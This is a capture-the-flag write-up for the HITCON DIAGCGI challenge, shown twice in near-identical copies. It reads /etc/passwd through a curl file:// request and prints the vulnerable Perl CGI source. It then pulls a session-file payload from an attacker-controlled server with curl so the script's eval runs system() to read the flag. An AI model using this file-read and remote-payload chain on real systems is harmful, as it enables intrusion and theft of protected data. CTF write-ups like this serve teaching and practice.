noncetonic/DIAGCGI Writeup

## DIAGCGI Writeup
#DIAGCGI

##Arbitrary File Read

```file:///etc/passwd``` and use curl function shows us

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
key:x:1001:1001::/home/key:
```

##Command Execution
Default location for cgi-bin on Ubuntu (gained by reading ```/etc/issue```) is ```/usr/lib/cgi-bin```; as such we can read ```/usr/lib/cgi-bin/dana-na.cgi``` and get the following:

```
#!/usr/bin/perl -w

use CGI;
use Digest::MD5 qw(md5_hex);

$cgi = new CGI;
$SESSDIR = "/tmp/";
$sessfile = $cgi->cookie("diagsess");
$arg0 = $cgi->param("arg");
$action = $cgi->param("action");
$arg = &safestr($arg0);

if (! defined($sessfile) )
{
	if ( md5_hex($cgi->param("sechash")) =~ /^000000000000.*$/)
	{
		$sesshash{'user'} = 'admin';
	}
	else
	{
		$sesshash{'user'}  = 'guest';
	}
	$sesshash{'ip'} = &get_ip;

	$diagsess = md5_hex( $sesshash{'user'} . '|||' . $sesshash{'ip'} );
	$cookie = "diagsess=$diagsess;";
	&write_session;
	print $cgi->header(-cookie => $cookie,
			-expires => 'Mon, 01 Jan 1999 00:00:00 GMT',
			-'cache-control' => 'no-cache',
			-pragma => 'no-cache',-'location'=> 'dana-na.cgi?sechash=' );

	exit 0;
}
else
{
	print $cgi->header();
	&read_session;
	&print_menu;
}
if (defined ($action) && length($action)>0)
{
	if ($action =~ /^print_session$/)
	{
		&print_session;
		exit 0;
	}
	if ($action =~ /^curl$/)
	{
		&curl($arg);
		exit 0;
	}
	if ($action =~ /^ping$/ )
	{
		&ping($arg);
		exit 0;
	}
	if ($action =~ /^traceroute$/)
	{
		&traceroute ($arg);
		exit 0;
	}
	if ($action =~ /^shell$/)
	{
		&shell($arg);
		exit 0;
	}

}

sub curl
{
	$host = shift;
	print "<pre><textarea rows=24 cols=80>";
	if (defined($host) && length($host)>1)
	{
		open(GG,"/usr/bin/curl -s $host |") and do
		{
			while(<GG>)
			{
				print;
			}
		}
	}
}

sub ping
{
	my $host = shift;
	print "<pre>";
	if(defined($host) && length($host)>1)
	{
		open(GG,"/bin/ping -c3 $host |") and do
		{
			while(<GG>)
			{

				print;
			}

		};
		close GG;

	}
}

sub traceroute
{
	my $host = shift;
	print "<pre>";
	if(defined($host) && length($host)>1)
	{
		open(GG,"/usr/sbin/traceroute -d -n -w 5 $host |") and do
		{
			while(<GG>)
			{
				print;
			}

		};
		close GG;
	}
}

sub read_session
{
	undef %sesshash;
	if(! -f "$SESSDIR/$sessfile")
	{
		print "session error!";
		return;
	}
	open(GG, "$SESSDIR/$sessfile") and do {
		while (<GG>) {
			eval($_);
		}
		close GG;
	};
}

sub write_session
{
	open(GG, ">$SESSDIR/$diagsess") and do
	{
		foreach (sort keys %sesshash)
		{
			print GG "\$sesshash{'$_'} = '$sesshash{$_}';\n";
		}
	};
	close GG;
}

sub print_session
{
	foreach (sort keys %sesshash) {
		print "$_=$sesshash{$_}\n";
	}
}

sub shell
{
	$cmd = shift;
	print "<pre>";
	if (  $sesshash{'user'} eq 'admin' )
	{
		open(GG, "$cmd |") and do
		{
			print;
		};
	}
	else
	{
		print "sorry $sesshash{'user'}! you're not admin!\n";

	}
}

sub print_menu
{
	$arg0 =~ s/\</\<\;/g;
	open(GG,"cat menu.html |") and do
	{
		while(<GG>)
		{
			$_ =~ s/\%\%arg\%\%/$arg0/g;
			print $_;
		}
		close GG;
	};
}

sub get_ip
{
	$h1 = $ENV{'REMOTE_ADDR'};
	$h2 = $ENV{'HTTP_CLIENT_IP'};
	$h3 = $ENV{'HTTP_X_FORWARDED_FOR'};

	if (length($h3)>0)
	{
		return $h3;
	}
	elsif (length($h2)>0)
	{
		return $h2;
	}
	else
	{
		return $h1;
	}
	return "UNKNOWN";
}

sub safestr
{
	my $str = shift;

	$str =~  s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;;
	return $str;

}
```

```read_session``` function evaluates everything in the session file and as we know our cookie, we can read our session file in ```/tmp/<cookie>``` . Additionally we know it's possible to create/override files using curl's -o output flag and pointing it to our session file. Using similar techniques to the full solution we can run the ```ls``` command on the server root and see the following:

```
total 988K
drwxr-xr-x 22 root root 4.0K Aug 13 16:29 .
drwxr-xr-x 22 root root 4.0K Aug 13 16:29 ..
drwxr-xr-x 2 root root 4.0K Jul 27 11:15 bin
drwxr-xr-x 3 root root 4.0K Jul 27 11:16 boot
drwxr-xr-x 13 root root 3.9K Aug 13 16:29 dev
drwxr-xr-x 90 root root 4.0K Aug 13 16:29 etc
drwxr-xr-x 3 root root 4.0K Jul 27 05:17 home
lrwxrwxrwx 1 root root 33 Jun 7 10:50 initrd.img -> boot/initrd.img-3.13.0-29-generic
-r-------- 1 key www-data 41 Jul 28 08:37 key.txt
drwxr-xr-x 21 root root 4.0K Jul 28 08:35 lib
drwxr-xr-x 2 root root 4.0K Aug 13 16:29 lib64
drwx------ 2 root root 16K Jun 7 10:51 lost+found
drwxr-xr-x 2 root root 4.0K Jun 7 10:49 media
drwxr-xr-x 2 root root 4.0K Apr 10 22:12 mnt
drwxr-xr-x 2 root root 4.0K Jun 7 10:49 opt
dr-xr-xr-x 155 root root 0 Aug 13 16:29 proc
-r-sr-x--- 1 key www-data 858K Jul 28 08:39 read_key
drwx------ 4 root root 4.0K Aug 16 11:37 root
drwxr-xr-x 19 root root 680 Aug 17 00:20 run
drwxr-xr-x 2 root root 12K Aug 13 16:29 sbin
drwxr-xr-x 2 root root 4.0K Jun 7 10:49 srv
dr-xr-xr-x 13 root root 0 Aug 13 16:29 sys
drwxrwxrwt 2 root root 36K Aug 17 00:33 tmp
drwxr-xr-x 10 root root 4.0K Jun 7 10:49 usr
drwxr-xr-x 13 root root 4.0K Jul 27 11:18 var
lrwxrwxrwx 1 root root 30 Jun 7 10:50 vmlinuz -> boot/vmlinuz-3.13.0-29-generic
```

```key.txt``` doesn't have read permissions for us but the ```read_key``` binary is setuid and we can assume this is how the organizers want us to read the keyfile. In most of these instances where you need to run a binary to read a file they expect the file to be read as an argument.

Leveraging these bits of information we write the following in to a webserver we control

```
$sesshash{'ip'} = 'YOUR.IP.GOES.HERE';
$sesshash{'user'} = 'admin';
system("/read_key /key.txt >>/tmp/test.txt");
```

Then we simply curl that into our session file, reload the page to have our session read and then read /tmp/test.txt and to get our key

##The Key

```HITCON{a755be06b165ed8fc4710d3544fce942}```
	#DIAGCGI

	##Arbitrary File Read

	```file:///etc/passwd``` and use curl function shows us

	```
	root:x:0:0:root:/root:/bin/bash
	daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
	bin:x:2:2:bin:/bin:/usr/sbin/nologin
	sys:x:3:3:sys:/dev:/usr/sbin/nologin
	sync:x:4:65534:sync:/bin:/bin/sync
	games:x:5:60:games:/usr/games:/usr/sbin/nologin
	man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
	lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
	mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
	news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
	uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
	proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
	www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
	backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
	list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
	irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
	gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
	nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
	libuuid:x:100:101::/var/lib/libuuid:
	syslog:x:101:104::/home/syslog:/bin/false
	messagebus:x:102:106::/var/run/dbus:/bin/false
	landscape:x:103:109::/var/lib/landscape:/bin/false
	sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
	pollinate:x:105:1::/var/cache/pollinate:/bin/false
	ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
	key:x:1001:1001::/home/key:
	```

	##Command Execution
	Default location for cgi-bin on Ubuntu (gained by reading ```/etc/issue```) is ```/usr/lib/cgi-bin```; as such we can read ```/usr/lib/cgi-bin/dana-na.cgi``` and get the following:

	```
	#!/usr/bin/perl -w

	use CGI;
	use Digest::MD5 qw(md5_hex);

	$cgi = new CGI;
	$SESSDIR = "/tmp/";
	$sessfile = $cgi->cookie("diagsess");
	$arg0 = $cgi->param("arg");
	$action = $cgi->param("action");
	$arg = &safestr($arg0);

	if (! defined($sessfile) )
	{
	if ( md5_hex($cgi->param("sechash")) =~ /^000000000000.*$/)
	{
	$sesshash{'user'} = 'admin';
	}
	else
	{
	$sesshash{'user'} = 'guest';
	}
	$sesshash{'ip'} = &get_ip;

	$diagsess = md5_hex( $sesshash{'user'} . '\|\|\|' . $sesshash{'ip'} );
	$cookie = "diagsess=$diagsess;";
	&write_session;
	print $cgi->header(-cookie => $cookie,
	-expires => 'Mon, 01 Jan 1999 00:00:00 GMT',
	-'cache-control' => 'no-cache',
	-pragma => 'no-cache',-'location'=> 'dana-na.cgi?sechash=' );

	exit 0;
	}
	else
	{
	print $cgi->header();
	&read_session;
	&print_menu;
	}
	if (defined ($action) && length($action)>0)
	{
	if ($action =~ /^print_session$/)
	{
	&print_session;
	exit 0;
	}
	if ($action =~ /^curl$/)
	{
	&curl($arg);
	exit 0;
	}
	if ($action =~ /^ping$/ )
	{
	&ping($arg);
	exit 0;
	}
	if ($action =~ /^traceroute$/)
	{
	&traceroute ($arg);
	exit 0;
	}
	if ($action =~ /^shell$/)
	{
	&shell($arg);
	exit 0;
	}

	}

	sub curl
	{
	$host = shift;
	print "<pre><textarea rows=24 cols=80>";
	if (defined($host) && length($host)>1)
	{
	open(GG,"/usr/bin/curl -s $host \|") and do
	{
	while(<GG>)
	{
	print;
	}
	}
	}
	}

	sub ping
	{
	my $host = shift;
	print "<pre>";
	if(defined($host) && length($host)>1)
	{
	open(GG,"/bin/ping -c3 $host \|") and do
	{
	while(<GG>)
	{

	print;
	}

	};
	close GG;

	}
	}

	sub traceroute
	{
	my $host = shift;
	print "<pre>";
	if(defined($host) && length($host)>1)
	{
	open(GG,"/usr/sbin/traceroute -d -n -w 5 $host \|") and do
	{
	while(<GG>)
	{
	print;
	}

	};
	close GG;
	}
	}

	sub read_session
	{
	undef %sesshash;
	if(! -f "$SESSDIR/$sessfile")
	{
	print "session error!";
	return;
	}
	open(GG, "$SESSDIR/$sessfile") and do {
	while (<GG>) {
	eval($_);
	}
	close GG;
	};
	}

	sub write_session
	{
	open(GG, ">$SESSDIR/$diagsess") and do
	{
	foreach (sort keys %sesshash)
	{
	print GG "\$sesshash{'$_'} = '$sesshash{$_}';\n";
	}
	};
	close GG;
	}

	sub print_session
	{
	foreach (sort keys %sesshash) {
	print "$_=$sesshash{$_}\n";
	}
	}

	sub shell
	{
	$cmd = shift;
	print "<pre>";
	if ( $sesshash{'user'} eq 'admin' )
	{
	open(GG, "$cmd \|") and do
	{
	print;
	};
	}
	else
	{
	print "sorry $sesshash{'user'}! you're not admin!\n";

	}
	}

	sub print_menu
	{
	$arg0 =~ s/\</\<\;/g;
	open(GG,"cat menu.html \|") and do
	{
	while(<GG>)
	{
	$_ =~ s/\%\%arg\%\%/$arg0/g;
	print $_;
	}
	close GG;
	};
	}

	sub get_ip
	{
	$h1 = $ENV{'REMOTE_ADDR'};
	$h2 = $ENV{'HTTP_CLIENT_IP'};
	$h3 = $ENV{'HTTP_X_FORWARDED_FOR'};

	if (length($h3)>0)
	{
	return $h3;
	}
	elsif (length($h2)>0)
	{
	return $h2;
	}
	else
	{
	return $h1;
	}
	return "UNKNOWN";
	}

	sub safestr
	{
	my $str = shift;

	$str =~ s/([;<>\*\\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;;
	return $str;

	}
	```

	```read_session``` function evaluates everything in the session file and as we know our cookie, we can read our session file in ```/tmp/<cookie>``` . Additionally we know it's possible to create/override files using curl's -o output flag and pointing it to our session file. Using similar techniques to the full solution we can run the ```ls``` command on the server root and see the following:

	```
	total 988K
	drwxr-xr-x 22 root root 4.0K Aug 13 16:29 .
	drwxr-xr-x 22 root root 4.0K Aug 13 16:29 ..
	drwxr-xr-x 2 root root 4.0K Jul 27 11:15 bin
	drwxr-xr-x 3 root root 4.0K Jul 27 11:16 boot
	drwxr-xr-x 13 root root 3.9K Aug 13 16:29 dev
	drwxr-xr-x 90 root root 4.0K Aug 13 16:29 etc
	drwxr-xr-x 3 root root 4.0K Jul 27 05:17 home
	lrwxrwxrwx 1 root root 33 Jun 7 10:50 initrd.img -> boot/initrd.img-3.13.0-29-generic
	-r-------- 1 key www-data 41 Jul 28 08:37 key.txt
	drwxr-xr-x 21 root root 4.0K Jul 28 08:35 lib
	drwxr-xr-x 2 root root 4.0K Aug 13 16:29 lib64
	drwx------ 2 root root 16K Jun 7 10:51 lost+found
	drwxr-xr-x 2 root root 4.0K Jun 7 10:49 media
	drwxr-xr-x 2 root root 4.0K Apr 10 22:12 mnt
	drwxr-xr-x 2 root root 4.0K Jun 7 10:49 opt
	dr-xr-xr-x 155 root root 0 Aug 13 16:29 proc
	-r-sr-x--- 1 key www-data 858K Jul 28 08:39 read_key
	drwx------ 4 root root 4.0K Aug 16 11:37 root
	drwxr-xr-x 19 root root 680 Aug 17 00:20 run
	drwxr-xr-x 2 root root 12K Aug 13 16:29 sbin
	drwxr-xr-x 2 root root 4.0K Jun 7 10:49 srv
	dr-xr-xr-x 13 root root 0 Aug 13 16:29 sys
	drwxrwxrwt 2 root root 36K Aug 17 00:33 tmp
	drwxr-xr-x 10 root root 4.0K Jun 7 10:49 usr
	drwxr-xr-x 13 root root 4.0K Jul 27 11:18 var
	lrwxrwxrwx 1 root root 30 Jun 7 10:50 vmlinuz -> boot/vmlinuz-3.13.0-29-generic
	```

	```key.txt``` doesn't have read permissions for us but the ```read_key``` binary is setuid and we can assume this is how the organizers want us to read the keyfile. In most of these instances where you need to run a binary to read a file they expect the file to be read as an argument.

	Leveraging these bits of information we write the following in to a webserver we control

	```
	$sesshash{'ip'} = 'YOUR.IP.GOES.HERE';
	$sesshash{'user'} = 'admin';
	system("/read_key /key.txt >>/tmp/test.txt");
	```

	Then we simply curl that into our session file, reload the page to have our session read and then read /tmp/test.txt and to get our key

	##The Key

	```HITCON{a755be06b165ed8fc4710d3544fce942}```